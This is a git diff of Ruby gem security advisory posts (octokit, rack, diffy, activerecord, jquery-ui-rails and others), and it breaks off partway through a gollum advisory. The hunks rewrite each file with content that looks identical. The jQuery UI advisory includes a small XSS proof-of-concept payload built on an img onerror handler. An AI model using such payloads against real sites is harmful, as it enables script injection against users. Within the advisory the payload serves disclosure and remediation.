+title: 'CVE-2022-31071 (octopoller): Octopoller gem published with world-writable
+  files'
+comments: false
+categories:
+- octopoller
+advisory:
+  gem: octopoller
+  cve: 2022-31071
+  ghsa: 26qj-cr27-r5c4
+  url: https://github.com/octokit/octopoller.rb/security/advisories/GHSA-26qj-cr27-r5c4
+  title: Octopoller gem published with world-writable files
+  date: 2022-06-15
+  description: |
+    ### Impact
+
+    Version [0.2.0](https://rubygems.org/gems/octopoller/versions/0.2.0)
+    of the octopoller gem was published containing world-writeable files. Specifically,
+    the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e.
+    0666) instead of `rw-r--r--` (i.e. 0644).
+
+    This means everyone who is not the owner (Group and Public) with access to the
+    instance where this release had been installed could modify the world-writable
+    files from this gem.
+
+    Malicious code already present and running on your machine, separate from this
+    package, could modify the gem’s files and change its behavior during runtime.
+
+    ### Patches
+    * octopoller v0.3.0
+
+    ### Workarounds
+    Users can use the previous version of the gem [v0.1.0](https://rubygems.org/gems/octopoller/versions/0.1.0).
+    Alternatively, users can modify the file permissions manually until they are able
+    to upgrade to the latest version.
+  cvss_v3: 2.5
+  unaffected_versions:
+  - "< 0.2.0"
+  patched_versions:
+  - ">= 0.3.0"
+---
diff --git a/advisories/_posts/2022-06-15-CVE-2022-31072.md b/advisories/_posts/2022-06-15-CVE-2022-31072.md
index 2054b370..14e5dbb8 100644
--- a/advisories/_posts/2022-06-15-CVE-2022-31072.md
+++ b/advisories/_posts/2022-06-15-CVE-2022-31072.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2022-31072 (octokit): Octokit gem published with world-writable files'
-comments: false
-categories:
-- octokit
-advisory:
-  gem: octokit
-  cve: 2022-31072
-  ghsa: g28x-pgr3-qqx6
-  url: https://github.com/octokit/octokit.rb/security/advisories/GHSA-g28x-pgr3-qqx6
-  title: Octokit gem published with world-writable files
-  date: 2022-06-15
-  description: |
-    ### Impact
-
-    Versions [4.23.0](https://rubygems.org/gems/octokit/versions/4.23.0)
-    and [4.24.0](https://rubygems.org/gems/octokit/versions/4.24.0) of the octokit gem
-    were published containing world-writeable files.
-
-    Specifically, the gem was packed
-    with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--`
-    (i.e. 0644). This means everyone who is not the owner (Group and Public) with access
-    to the instance where this release had been installed could modify the world-writable
-    files from this gem.
-
-    Malicious code already present and running on your machine,
-    separate from this package, could modify the gem’s files and change its behavior
-    during runtime.
-
-    ### Patches
-
-    * [octokit 4.25.0](https://rubygems.org/gems/octokit/versions/4.25.0)
-
-    ### Workarounds
-    Users can use the previous version of the gem [v4.22.0](https://rubygems.org/gems/octokit/versions/4.22.0).
-    Alternatively, users can modify the file permissions manually until they are able
-    to upgrade to the latest version.
-  cvss_v3: 2.5
-  unaffected_versions:
-  - "< 4.23.0"
-  patched_versions:
-  - ">= 4.25.0"
-  related:
-    url:
-    - https://github.com/octokit/octokit.rb/commit/1c8edecc9cf23d1ceb959d91a416a69f55ce7d55
----
+---
+layout: advisory
+title: 'CVE-2022-31072 (octokit): Octokit gem published with world-writable files'
+comments: false
+categories:
+- octokit
+advisory:
+  gem: octokit
+  cve: 2022-31072
+  ghsa: g28x-pgr3-qqx6
+  url: https://github.com/octokit/octokit.rb/security/advisories/GHSA-g28x-pgr3-qqx6
+  title: Octokit gem published with world-writable files
+  date: 2022-06-15
+  description: |
+    ### Impact
+
+    Versions [4.23.0](https://rubygems.org/gems/octokit/versions/4.23.0)
+    and [4.24.0](https://rubygems.org/gems/octokit/versions/4.24.0) of the octokit gem
+    were published containing world-writeable files.
+
+    Specifically, the gem was packed
+    with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--`
+    (i.e. 0644). This means everyone who is not the owner (Group and Public) with access
+    to the instance where this release had been installed could modify the world-writable
+    files from this gem.
+
+    Malicious code already present and running on your machine,
+    separate from this package, could modify the gem’s files and change its behavior
+    during runtime.
+
+    ### Patches
+
+    * [octokit 4.25.0](https://rubygems.org/gems/octokit/versions/4.25.0)
+
+    ### Workarounds
+    Users can use the previous version of the gem [v4.22.0](https://rubygems.org/gems/octokit/versions/4.22.0).
+    Alternatively, users can modify the file permissions manually until they are able
+    to upgrade to the latest version.
+  cvss_v3: 2.5
+  unaffected_versions:
+  - "< 4.23.0"
+  patched_versions:
+  - ">= 4.25.0"
+  related:
+    url:
+    - https://github.com/octokit/octokit.rb/commit/1c8edecc9cf23d1ceb959d91a416a69f55ce7d55
+---
diff --git a/advisories/_posts/2022-06-24-CVE-2022-33127.md b/advisories/_posts/2022-06-24-CVE-2022-33127.md
index fc799410..dfbe369e 100644
--- a/advisories/_posts/2022-06-24-CVE-2022-33127.md
+++ b/advisories/_posts/2022-06-24-CVE-2022-33127.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2022-33127 (diffy): Improper handling of double quotes in file name in
-  Diffy in Windows environment'
-comments: false
-categories:
-- diffy
-advisory:
-  gem: diffy
-  cve: 2022-33127
-  ghsa: 5ww9-9qp2-x524
-  url: https://github.com/samg/diffy/commit/478f392082b66d38f54a02b4bb9c41be32fd6593
-  title: Improper handling of double quotes in file name in Diffy in Windows environment
-  date: 2022-06-24
-  description: |
-    The function that calls the diff tool in versions of Diffy prior to 3.4.1
-    does not properly handle double quotes in a filename when run in a Windows environment.
-    This allows attackers to execute arbitrary commands via a crafted string.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 3.4.1"
-  related:
-    url:
-    - https://github.com/samg/diffy/blob/56fd935aea256742f7352b050592542d3d153bf6/CHANGELOG#L1
----
+---
+layout: advisory
+title: 'CVE-2022-33127 (diffy): Improper handling of double quotes in file name in
+  Diffy in Windows environment'
+comments: false
+categories:
+- diffy
+advisory:
+  gem: diffy
+  cve: 2022-33127
+  ghsa: 5ww9-9qp2-x524
+  url: https://github.com/samg/diffy/commit/478f392082b66d38f54a02b4bb9c41be32fd6593
+  title: Improper handling of double quotes in file name in Diffy in Windows environment
+  date: 2022-06-24
+  description: |
+    The function that calls the diff tool in versions of Diffy prior to 3.4.1
+    does not properly handle double quotes in a filename when run in a Windows environment.
+    This allows attackers to execute arbitrary commands via a crafted string.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 3.4.1"
+  related:
+    url:
+    - https://github.com/samg/diffy/blob/56fd935aea256742f7352b050592542d3d153bf6/CHANGELOG#L1
+---
diff --git a/advisories/_posts/2022-06-27-CVE-2022-30122.md b/advisories/_posts/2022-06-27-CVE-2022-30122.md
index 87e85d32..2c2481f5 100644
--- a/advisories/_posts/2022-06-27-CVE-2022-30122.md
+++ b/advisories/_posts/2022-06-27-CVE-2022-30122.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'CVE-2022-30122 (rack): Denial of Service Vulnerability in Rack Multipart Parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2022-30122
-  ghsa: hxqx-xwvh-44m2
-  url: https://groups.google.com/g/ruby-security-ann/c/L2Axto442qk
-  title: Denial of Service Vulnerability in Rack Multipart Parsing
-  date: 2022-06-27
-  description: |
-    There is a possible denial of service vulnerability in the multipart parsing
-    component of Rack.  This vulnerability has been assigned the CVE identifier
-    CVE-2022-30122.
-
-    Versions Affected:  >= 1.2
-    Not affected:       < 1.2
-    Fixed Versions:     2.0.9.1, 2.1.4.1, 2.2.3.1
-
-    ## Impact
-    Carefully crafted multipart POST requests can cause Rack's multipart parser to
-    take much longer than expected, leading to a possible denial of service
-    vulnerability.
-
-    Impacted code will use Rack's multipart parser to parse multipart posts.  This
-    includes directly using the multipart parser like this:
-
-    ```
-    params = Rack::Multipart.parse_multipart(env)
-    ```
-
-    But it also includes reading POST data from a Rack request object like this:
-
-    ```
-    p request.POST # read POST data
-    p request.params # reads both query params and POST data
-    ```
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    ## Workarounds
-    There are no feasible workarounds for this issue.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 1.2"
-  patched_versions:
-  - "~> 2.0.9, >= 2.0.9.1"
-  - "~> 2.1.4, >= 2.1.4.1"
-  - ">= 2.2.3.1"
----
+---
+layout: advisory
+title: 'CVE-2022-30122 (rack): Denial of Service Vulnerability in Rack Multipart Parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2022-30122
+  ghsa: hxqx-xwvh-44m2
+  url: https://groups.google.com/g/ruby-security-ann/c/L2Axto442qk
+  title: Denial of Service Vulnerability in Rack Multipart Parsing
+  date: 2022-06-27
+  description: |
+    There is a possible denial of service vulnerability in the multipart parsing
+    component of Rack.  This vulnerability has been assigned the CVE identifier
+    CVE-2022-30122.
+
+    Versions Affected:  >= 1.2
+    Not affected:       < 1.2
+    Fixed Versions:     2.0.9.1, 2.1.4.1, 2.2.3.1
+
+    ## Impact
+    Carefully crafted multipart POST requests can cause Rack's multipart parser to
+    take much longer than expected, leading to a possible denial of service
+    vulnerability.
+
+    Impacted code will use Rack's multipart parser to parse multipart posts.  This
+    includes directly using the multipart parser like this:
+
+    ```
+    params = Rack::Multipart.parse_multipart(env)
+    ```
+
+    But it also includes reading POST data from a Rack request object like this:
+
+    ```
+    p request.POST # read POST data
+    p request.params # reads both query params and POST data
+    ```
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    ## Workarounds
+    There are no feasible workarounds for this issue.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 1.2"
+  patched_versions:
+  - "~> 2.0.9, >= 2.0.9.1"
+  - "~> 2.1.4, >= 2.1.4.1"
+  - ">= 2.2.3.1"
+---
diff --git a/advisories/_posts/2022-06-27-CVE-2022-30123.md b/advisories/_posts/2022-06-27-CVE-2022-30123.md
index 09e44ddb..d0a055be 100644
--- a/advisories/_posts/2022-06-27-CVE-2022-30123.md
+++ b/advisories/_posts/2022-06-27-CVE-2022-30123.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'CVE-2022-30123 (rack): Possible shell escape sequence injection vulnerability
-  in Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2022-30123
-  ghsa: wq4h-7r42-5hrr
-  url: https://groups.google.com/g/ruby-security-ann/c/LWB10kWzag8
-  title: Possible shell escape sequence injection vulnerability in Rack
-  date: 2022-06-27
-  description: |
-    There is a possible shell escape sequence injection vulnerability in the Lint
-    and CommonLogger components of Rack.  This vulnerability has been assigned the
-    CVE identifier CVE-2022-30123.
-
-    Versions Affected:  All.
-    Not affected:       None
-    Fixed Versions:     2.0.9.1, 2.1.4.1, 2.2.3.1
-
-    ## Impact
-    Carefully crafted requests can cause shell escape sequences to be written to
-    the terminal via Rack's Lint middleware and CommonLogger middleware.  These
-    escape sequences can be leveraged to possibly execute commands in the victim's
-    terminal.
-
-    Impacted applications will have either of these middleware installed, and
-    vulnerable apps may have something like this:
-
-    ```
-    use Rack::Lint
-    ```
-
-    Or
-
-    ```
-    use Rack::CommonLogger
-    ```
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    ## Workarounds
-    Remove these middleware from your application
-  cvss_v3: 10.0
-  patched_versions:
-  - "~> 2.0.9, >= 2.0.9.1"
-  - "~> 2.1.4, >= 2.1.4.1"
-  - ">= 2.2.3.1"
----
+---
+layout: advisory
+title: 'CVE-2022-30123 (rack): Possible shell escape sequence injection vulnerability
+  in Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2022-30123
+  ghsa: wq4h-7r42-5hrr
+  url: https://groups.google.com/g/ruby-security-ann/c/LWB10kWzag8
+  title: Possible shell escape sequence injection vulnerability in Rack
+  date: 2022-06-27
+  description: |
+    There is a possible shell escape sequence injection vulnerability in the Lint
+    and CommonLogger components of Rack.  This vulnerability has been assigned the
+    CVE identifier CVE-2022-30123.
+
+    Versions Affected:  All.
+    Not affected:       None
+    Fixed Versions:     2.0.9.1, 2.1.4.1, 2.2.3.1
+
+    ## Impact
+    Carefully crafted requests can cause shell escape sequences to be written to
+    the terminal via Rack's Lint middleware and CommonLogger middleware.  These
+    escape sequences can be leveraged to possibly execute commands in the victim's
+    terminal.
+
+    Impacted applications will have either of these middleware installed, and
+    vulnerable apps may have something like this:
+
+    ```
+    use Rack::Lint
+    ```
+
+    Or
+
+    ```
+    use Rack::CommonLogger
+    ```
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    ## Workarounds
+    Remove these middleware from your application
+  cvss_v3: 10.0
+  patched_versions:
+  - "~> 2.0.9, >= 2.0.9.1"
+  - "~> 2.1.4, >= 2.1.4.1"
+  - ">= 2.2.3.1"
+---
diff --git a/advisories/_posts/2022-06-28-CVE-2021-3779.md b/advisories/_posts/2022-06-28-CVE-2021-3779.md
index 482097dc..c7c75cc6 100644
--- a/advisories/_posts/2022-06-28-CVE-2021-3779.md
+++ b/advisories/_posts/2022-06-28-CVE-2021-3779.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2021-3779 (ruby-mysql): ruby-mysql Client File Read'
-comments: false
-categories:
-- ruby-mysql
-advisory:
-  gem: ruby-mysql
-  cve: 2021-3779
-  ghsa: 73pr-g6jj-5hc9
-  url: https://www.rapid7.com/blog/post/2022/06/28/cve-2021-3779-ruby-mysql-gem-client-file-read-fixed/
-  title: ruby-mysql Client File Read
-  date: 2022-06-28
-  description: |
-    A malicious MySQL server can request local file content from a client using ruby-mysql prior to version
-    2.10.0 without explicit authorization from the user. This issue was resolved in version 2.10.0 and
-    later.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 2.10.0"
-  related:
-    url:
-    - https://github.com/rubysec/ruby-advisory-db/issues/507
-    - https://my.diffend.io/gems/ruby-mysql/2.9.14/2.10.0#d2h-806753-331
----
+---
+layout: advisory
+title: 'CVE-2021-3779 (ruby-mysql): ruby-mysql Client File Read'
+comments: false
+categories:
+- ruby-mysql
+advisory:
+  gem: ruby-mysql
+  cve: 2021-3779
+  ghsa: 73pr-g6jj-5hc9
+  url: https://www.rapid7.com/blog/post/2022/06/28/cve-2021-3779-ruby-mysql-gem-client-file-read-fixed/
+  title: ruby-mysql Client File Read
+  date: 2022-06-28
+  description: |
+    A malicious MySQL server can request local file content from a client using ruby-mysql prior to version
+    2.10.0 without explicit authorization from the user. This issue was resolved in version 2.10.0 and
+    later.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 2.10.0"
+  related:
+    url:
+    - https://github.com/rubysec/ruby-advisory-db/issues/507
+    - https://my.diffend.io/gems/ruby-mysql/2.9.14/2.10.0#d2h-806753-331
+---
diff --git a/advisories/_posts/2022-07-05-CVE-2022-31115.md b/advisories/_posts/2022-07-05-CVE-2022-31115.md
index 30e1ae2e..4380502d 100644
--- a/advisories/_posts/2022-07-05-CVE-2022-31115.md
+++ b/advisories/_posts/2022-07-05-CVE-2022-31115.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2022-31115 (opensearch-ruby): Unsafe YAML deserialization in opensearch-ruby'
-comments: false
-categories:
-- opensearch-ruby
-advisory:
-  gem: opensearch-ruby
-  cve: 2022-31115
-  ghsa: 977c-63xq-cgw3
-  url: https://github.com/opensearch-project/opensearch-ruby/security/advisories/GHSA-977c-63xq-cgw3
-  title: Unsafe YAML deserialization in opensearch-ruby
-  date: 2022-07-05
-  description: |
-    ### Impact
-    A YAML deserialization in opensearch-ruby 2.0.0 can lead to unsafe deserialization using
-    YAML.load if the response is of type YAML.
-
-    ### Patches
-    The problem has been patched in opensearch-ruby gem version 2.0.2.
-
-    ### Workarounds
-    No viable workaround.  Please upgrade to 2.0.2
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 2.0.2"
-  related:
-    url:
-    - https://github.com/opensearch-project/opensearch-ruby/pull/77
-    - https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/
----
+---
+layout: advisory
+title: 'CVE-2022-31115 (opensearch-ruby): Unsafe YAML deserialization in opensearch-ruby'
+comments: false
+categories:
+- opensearch-ruby
+advisory:
+  gem: opensearch-ruby
+  cve: 2022-31115
+  ghsa: 977c-63xq-cgw3
+  url: https://github.com/opensearch-project/opensearch-ruby/security/advisories/GHSA-977c-63xq-cgw3
+  title: Unsafe YAML deserialization in opensearch-ruby
+  date: 2022-07-05
+  description: |
+    ### Impact
+    A YAML deserialization in opensearch-ruby 2.0.0 can lead to unsafe deserialization using
+    YAML.load if the response is of type YAML.
+
+    ### Patches
+    The problem has been patched in opensearch-ruby gem version 2.0.2.
+
+    ### Workarounds
+    No viable workaround.  Please upgrade to 2.0.2
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 2.0.2"
+  related:
+    url:
+    - https://github.com/opensearch-project/opensearch-ruby/pull/77
+    - https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/
+---
diff --git a/advisories/_posts/2022-07-12-CVE-2022-32224.md b/advisories/_posts/2022-07-12-CVE-2022-32224.md
index 5e738306..c3b5e889 100644
--- a/advisories/_posts/2022-07-12-CVE-2022-32224.md
+++ b/advisories/_posts/2022-07-12-CVE-2022-32224.md
@@ -1,87 +1,87 @@
----
-layout: advisory
-title: 'CVE-2022-32224 (activerecord): Possible RCE escalation bug with Serialized
-  Columns in Active Record'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2022-32224
-  ghsa: 3hhc-qp5v-9p2j
-  url: https://groups.google.com/g/rubyonrails-security/c/MmFO3LYQE8U
-  title: Possible RCE escalation bug with Serialized Columns in Active Record
-  date: 2022-07-12
-  description: |
-    There is a possible escalation to RCE when using YAML serialized columns in
-    Active Record. This vulnerability has been assigned the CVE identifier
-    CVE-2022-32224.
-
-    Versions Affected:  All.
-    Not affected:       None
-    Fixed Versions:     7.0.3.1, 6.1.6.1, 6.0.5.1, 5.2.8.1
-
-    Impact
-    ------
-    When serialized columns that use YAML (the default) are deserialized, Rails
-    uses `YAML.unsafe_load` to convert the YAML data in to Ruby objects.  If an
-    attacker can manipulate data in the database (via means like SQL injection),
-    then it may be possible for the attacker to escalate to an RCE.
-
-    Impacted Active Record models will look something like this:
-
-    ```ruby
-    class User < ApplicationRecord
-      serialize :options       # Vulnerable: Uses YAML for serialization
-      serialize :values, Array # Vulnerable: Uses YAML for serialization
-      serialize :values, JSON  # Not vulnerable
-    end
-    ```
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    The released versions change the default YAML deserializer to use
-    `YAML.safe_load`, which prevents deserialization of possibly dangerous
-    objects.  This may introduce backwards compatibility issues with existing
-    data.
-
-    In order to cope with that situation, the released version also contains two
-    new Active Record configuration options.  The configuration options are as
-    follows:
-
-    * `config.active_record.use_yaml_unsafe_load`
-
-    When set to true, this configuration option tells Rails to use the old
-    "unsafe" YAML loading strategy, maintaining the existing behavior but leaving
-    the possible escalation vulnerability in place.  Setting this option to true
-    is *not* recommended, but can aid in upgrading.
-
-    * `config.active_record.yaml_column_permitted_classes`
-
-    The "safe YAML" loading method does not allow all classes to be deserialized
-    by default.  This option allows you to specify classes deemed "safe" in your
-    application.  For example, if your application uses Symbol and Time in
-    serialized data, you can add Symbol and Time to the allowed list as follows:
-
-    ```
-    config.active_record.yaml_column_permitted_classes = [Symbol, Date, Time]
-    ```
-
-    Workarounds
-    -----------
-    There are no feasible workarounds for this issue, but other coders (such as
-    JSON) are not impacted.
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 5.2.8, >= 5.2.8.1"
-  - "~> 6.0.5, >= 6.0.5.1"
-  - "~> 6.1.6, >= 6.1.6.1"
-  - ">= 7.0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2022-32224 (activerecord): Possible RCE escalation bug with Serialized
+  Columns in Active Record'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2022-32224
+  ghsa: 3hhc-qp5v-9p2j
+  url: https://groups.google.com/g/rubyonrails-security/c/MmFO3LYQE8U
+  title: Possible RCE escalation bug with Serialized Columns in Active Record
+  date: 2022-07-12
+  description: |
+    There is a possible escalation to RCE when using YAML serialized columns in
+    Active Record. This vulnerability has been assigned the CVE identifier
+    CVE-2022-32224.
+
+    Versions Affected:  All.
+    Not affected:       None
+    Fixed Versions:     7.0.3.1, 6.1.6.1, 6.0.5.1, 5.2.8.1
+
+    Impact
+    ------
+    When serialized columns that use YAML (the default) are deserialized, Rails
+    uses `YAML.unsafe_load` to convert the YAML data in to Ruby objects.  If an
+    attacker can manipulate data in the database (via means like SQL injection),
+    then it may be possible for the attacker to escalate to an RCE.
+
+    Impacted Active Record models will look something like this:
+
+    ```ruby
+    class User < ApplicationRecord
+      serialize :options       # Vulnerable: Uses YAML for serialization
+      serialize :values, Array # Vulnerable: Uses YAML for serialization
+      serialize :values, JSON  # Not vulnerable
+    end
+    ```
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    The released versions change the default YAML deserializer to use
+    `YAML.safe_load`, which prevents deserialization of possibly dangerous
+    objects.  This may introduce backwards compatibility issues with existing
+    data.
+
+    In order to cope with that situation, the released version also contains two
+    new Active Record configuration options.  The configuration options are as
+    follows:
+
+    * `config.active_record.use_yaml_unsafe_load`
+
+    When set to true, this configuration option tells Rails to use the old
+    "unsafe" YAML loading strategy, maintaining the existing behavior but leaving
+    the possible escalation vulnerability in place.  Setting this option to true
+    is *not* recommended, but can aid in upgrading.
+
+    * `config.active_record.yaml_column_permitted_classes`
+
+    The "safe YAML" loading method does not allow all classes to be deserialized
+    by default.  This option allows you to specify classes deemed "safe" in your
+    application.  For example, if your application uses Symbol and Time in
+    serialized data, you can add Symbol and Time to the allowed list as follows:
+
+    ```
+    config.active_record.yaml_column_permitted_classes = [Symbol, Date, Time]
+    ```
+
+    Workarounds
+    -----------
+    There are no feasible workarounds for this issue, but other coders (such as
+    JSON) are not impacted.
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 5.2.8, >= 5.2.8.1"
+  - "~> 6.0.5, >= 6.0.5.1"
+  - "~> 6.1.6, >= 6.1.6.1"
+  - ">= 7.0.3.1"
+---
diff --git a/advisories/_posts/2022-07-15-CVE-2022-31160.md b/advisories/_posts/2022-07-15-CVE-2022-31160.md
index 152a28d2..a678c5f1 100644
--- a/advisories/_posts/2022-07-15-CVE-2022-31160.md
+++ b/advisories/_posts/2022-07-15-CVE-2022-31160.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2022-31160 (jquery-ui-rails): jQuery UI vulnerable to XSS when refreshing
-  a checkboxradio with an HTML-like initial text label'
-comments: false
-categories:
-- jquery-ui-rails
-advisory:
-  gem: jquery-ui-rails
-  cve: 2022-31160
-  ghsa: h6gj-6jjq-h8g9
-  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-h6gj-6jjq-h8g9
-  title: jQuery UI vulnerable to XSS when refreshing a checkboxradio with an HTML-like
-    initial text label
-  date: 2022-07-15
-  description: "### Impact\nInitializing a checkboxradio widget on an input enclosed
-    within a label makes\nthat parent label contents considered as the input label.
-    If you call\n`.checkboxradio( \"refresh\" )` on such a widget and the initial
-    HTML contained\nencoded HTML entities, they will erroneously get decoded. This
-    can lead to\npotentially executing JavaScript code.\n\nFor example, starting with
-    the following initial secure HTML:\n\n```html\n<label>\n\t<input id=\"test-input\">\n\t&lt;img
-    src=x onerror=\"alert(1)\"&gt;\n</label>\n```\n\nand calling:\n\n```javascript\n$(
-    \"#test-input\" ).checkboxradio();\n$( \"#test-input\" ).checkboxradio( \"refresh\"
-    );\n```\n\nwill turn the initial HTML into:\n\n```html\n<label>\n\t<!-- some jQuery
-    UI elements -->\n\t<input id=\"test-input\">\n\t<img src=x onerror=\"alert(1)\">\n</label>\n```\n\nand
-    the alert will get executed.\n\n### Patches\nThe bug has been patched in jQuery
-    UI 1.13.2.\n\n### Workarounds\nTo remediate the issue, if you can change the initial
-    HTML, you can wrap all\nthe non-input contents of the `label` in a `span`:\n\n```html\n<label>\n\t<input
-    id=\"test-input\">\n\t<span>&lt;img src=x onerror=\"alert(1)\"&gt;</span>\n</label>\n```\n\n###
-    References\nhttps://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/\n\n###
-    For more information\nIf you have any questions or comments about this advisory,
-    search for a\nrelevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc).\nIf
-    you don't find an answer, open a new issue.\n"
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 8.0.0"
-  related:
-    url:
-    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-h6gj-6jjq-h8g9
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-31160
-    - https://github.com/advisories/GHSA-h6gj-6jjq-h8g9#:~:text=https%3A//nvd.nist,12/msg00015.html
-    - https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/
-    - https://www.drupal.org/sa-contrib-2022-052
-    - https://security.netapp.com/advisory/ntap-20220909-0007/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6XBR3G3JR5ZIOJDO4224M3INXDS2VFDD/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5LGNTICB5BRFAG3DHVVELS6H3CZSQMO/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QB2FJQXCNHO32VGVOC6DY6IPGVE4VDU6/
-    - https://lists.debian.org/debian-lts-announce/2022/12/msg00015.html
----
+---
+layout: advisory
+title: 'CVE-2022-31160 (jquery-ui-rails): jQuery UI vulnerable to XSS when refreshing
+  a checkboxradio with an HTML-like initial text label'
+comments: false
+categories:
+- jquery-ui-rails
+advisory:
+  gem: jquery-ui-rails
+  cve: 2022-31160
+  ghsa: h6gj-6jjq-h8g9
+  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-h6gj-6jjq-h8g9
+  title: jQuery UI vulnerable to XSS when refreshing a checkboxradio with an HTML-like
+    initial text label
+  date: 2022-07-15
+  description: "### Impact\nInitializing a checkboxradio widget on an input enclosed
+    within a label makes\nthat parent label contents considered as the input label.
+    If you call\n`.checkboxradio( \"refresh\" )` on such a widget and the initial
+    HTML contained\nencoded HTML entities, they will erroneously get decoded. This
+    can lead to\npotentially executing JavaScript code.\n\nFor example, starting with
+    the following initial secure HTML:\n\n```html\n<label>\n\t<input id=\"test-input\">\n\t&lt;img
+    src=x onerror=\"alert(1)\"&gt;\n</label>\n```\n\nand calling:\n\n```javascript\n$(
+    \"#test-input\" ).checkboxradio();\n$( \"#test-input\" ).checkboxradio( \"refresh\"
+    );\n```\n\nwill turn the initial HTML into:\n\n```html\n<label>\n\t<!-- some jQuery
+    UI elements -->\n\t<input id=\"test-input\">\n\t<img src=x onerror=\"alert(1)\">\n</label>\n```\n\nand
+    the alert will get executed.\n\n### Patches\nThe bug has been patched in jQuery
+    UI 1.13.2.\n\n### Workarounds\nTo remediate the issue, if you can change the initial
+    HTML, you can wrap all\nthe non-input contents of the `label` in a `span`:\n\n```html\n<label>\n\t<input
+    id=\"test-input\">\n\t<span>&lt;img src=x onerror=\"alert(1)\"&gt;</span>\n</label>\n```\n\n###
+    References\nhttps://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/\n\n###
+    For more information\nIf you have any questions or comments about this advisory,
+    search for a\nrelevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc).\nIf
+    you don't find an answer, open a new issue.\n"
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 8.0.0"
+  related:
+    url:
+    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-h6gj-6jjq-h8g9
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31160
+    - https://github.com/advisories/GHSA-h6gj-6jjq-h8g9#:~:text=https%3A//nvd.nist,12/msg00015.html
+    - https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/
+    - https://www.drupal.org/sa-contrib-2022-052
+    - https://security.netapp.com/advisory/ntap-20220909-0007/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6XBR3G3JR5ZIOJDO4224M3INXDS2VFDD/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5LGNTICB5BRFAG3DHVVELS6H3CZSQMO/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QB2FJQXCNHO32VGVOC6DY6IPGVE4VDU6/
+    - https://lists.debian.org/debian-lts-announce/2022/12/msg00015.html
+---
diff --git a/advisories/_posts/2022-07-16-CVE-2020-35305.md b/advisories/_posts/2022-07-16-CVE-2020-35305.md
index 1028f96d..b58c4892 100644
--- a/advisories/_posts/2022-07-16-CVE-2020-35305.md
+++ b/advisories/_posts/2022-07-16-CVE-2020-35305.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2020-35305 (gollum): XSS via `filename` parameter to New Page dialog'
-comments: false
-categories:
-- gollum
-advisory:
-  gem: gollum
-  cve: 2020-35305
-  ghsa: fj2w-qmjp-3rjm
-  url: https://github.com/gollum/gollum/commit/137728cdabc0f60859fcd30404ad2b8fff6ef715
-  title: XSS via `filename` parameter to New Page dialog
-  date: 2022-07-16
-  description: |
-    Cross site scripting (XSS) in gollum 5.0 to 5.1.2 via the `filename` parameter
-    to the 'New Page' dialog.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 5.0"
-  patched_versions:
-  - ">= 5.1.2"
-  related:
